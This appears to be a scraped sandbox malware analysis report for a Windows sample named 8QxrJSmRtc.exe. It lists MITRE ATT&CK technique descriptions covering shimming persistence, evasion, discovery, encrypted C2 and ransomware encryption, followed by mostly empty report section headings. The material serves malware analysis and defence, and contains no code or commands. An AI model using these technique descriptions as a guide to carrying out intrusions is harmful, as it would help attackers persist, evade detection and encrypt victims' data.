Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 8QxrJSmRtc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: 8QxrJSmRtc.exe PID: 6768 Parent PID: 6076

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: 8QxrJSmRtc.exe PID: 6768 Parent PID: 6076 8QxrJSmRtc.exeCOMMON

Executed Functions